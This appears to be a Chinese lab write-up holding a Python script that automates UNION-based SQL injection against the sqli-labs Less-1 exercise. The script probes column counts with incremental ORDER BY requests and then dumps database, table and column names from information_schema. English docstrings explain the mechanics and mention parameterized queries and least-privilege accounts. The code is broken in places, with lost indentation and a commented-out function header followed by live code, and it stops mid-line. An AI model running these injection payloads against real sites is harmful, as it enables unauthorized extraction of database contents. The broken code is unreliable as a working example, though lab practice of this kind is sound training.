虽然这个很简单,但是还是写个脚本跑一下
Less-1
from http.client import PROCESSING, responses
from re import I, T
from typing import FrozenSet
from bs4.dammit import xml_encoding
from bs4.element import ProcessingInstruction
import requests
import urllib.request
from colorama import init, Fore, Back, Style
from requests.api import get
import bs4
import lxml
# payload = 'abcdefghijklmnopqrstuvwxyz~!@#$%^&*()<>?|,./`'
'''打开网页'''
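def send_request(url):
    """Fetch ``url`` with ``--+`` appended and return the response body as text.

    ``--+`` is appended verbatim. In a URL query string ``+`` decodes to a
    space, so the server receives ``-- ``, the SQL line-comment marker used by
    the lab probes in this script.

    Args:
        url: Address to request; the suffix is added by this function.

    Returns:
        The response body decoded as UTF-8.

    Raises:
        urllib.error.URLError: If the request cannot be completed.
        UnicodeDecodeError: If the body is not valid UTF-8.
    """
    # The context manager closes the response even if read() or decode()
    # raises; the original left the handle open.
    with urllib.request.urlopen(url + '--+') as res:
        return res.read().decode('utf-8')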
'''order by 查看注入点'''
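def order_by_N(url):
    """Count the columns of the page's query with incremental ``ORDER BY`` probes.

    For N = 1..100 the function requests ``url + 'order by N--+'`` and reads
    the text of the first element whose ``size`` attribute is ``'3'``. A probe
    counts as accepted while that text contains ``'Login'``; the first probe
    without it ends the scan.

    The probe only gives an answer when the target builds its SQL by
    concatenating the request parameter (presumably the sqli-labs Less-1
    exercise named at the top of this file; the caller is not visible here).
    A parameterized query would treat the whole value as data. On the server
    side, a run of requests with a rising ``order by N`` is an easy pattern to
    spot in access logs.

    Args:
        url: Base URL ending with the parameter prefix the probe is appended to.

    Returns:
        The largest N whose probe was accepted, or 0 if none was.
    """
    flag = 0
    for i in range(1, 101):
        probe_url = url + 'order by ' + str(i) + '--+'
        response = requests.get(probe_url)
        soup = bs4.BeautifulSoup(response.content, 'lxml')
        content = soup.find(size='3')
        # find() returns None when the page has no size="3" element; treat
        # that as a rejected probe instead of failing on None.text.
        shown = str(content.text) if content is not None else ''
        if 'Login' not in shown:
            break
        flag = i
        print(i)
    # Report flag, not i - 1: the two agree after a break, but if all 100
    # probes are accepted i - 1 is 99 while the value returned is 100.
    print("检测到注入点" + str(flag))
    return flag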
'''获得数据库名称'''
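def get_database(sql_url):
    """Request the schema-name listing through ``sql_url`` and print the result.

    Appends a ``UNION SELECT`` over ``information_schema.schemata`` to
    ``sql_url``, prints the URL being requested, then prints the text of the
    first element whose ``size`` attribute is ``'5'``.

    ``information_schema.schemata`` lists only the schemas the connected
    database account is allowed to see, so a least-privilege application
    account limits what this query can return.

    Args:
        sql_url: Base URL ending with the parameter prefix the query is
            appended to (the caller that builds it is not visible here).

    Returns:
        None. The result is printed, not returned.
    """
    sql_database = sql_url + 'union select 1,2,group_concat(schema_name) from information_schema.schemata --+'
    print("[正在执行SQL语句:]" + sql_database)
    response = requests.get(sql_database)
    soup = bs4.BeautifulSoup(response.content, 'lxml')
    content = soup.find(size='5')
    # find() returns None when the page shows no size="5" element; print an
    # empty result in that case rather than failing on None.text.
    shown = content.text if content is not None else ''
    print("爆破结果如下:" + shown)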
# 打印出来了 数据库
'''爆破数据库'''
def get_table(sql_url):
I = input("请输入想要注入的数据库:")
sql_table = sql_url+ " union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = '%s' --+" %I
print("[正在执行SQL语句:]"+sql_table)
result = requests.get(sql_table)
soup = bs4.BeautifulSoup(result.content,'lxml')
content = soup.find(size = '5')
print("爆破结果如下:"+content.text)
# 打印出来 表的列表
# '''爆破数据库的表'''
# def get_column(sql_url):
J = input("请输入想要查看到表:")
sql_column= sql_url+ "union select 1,2,group_concat(column_nam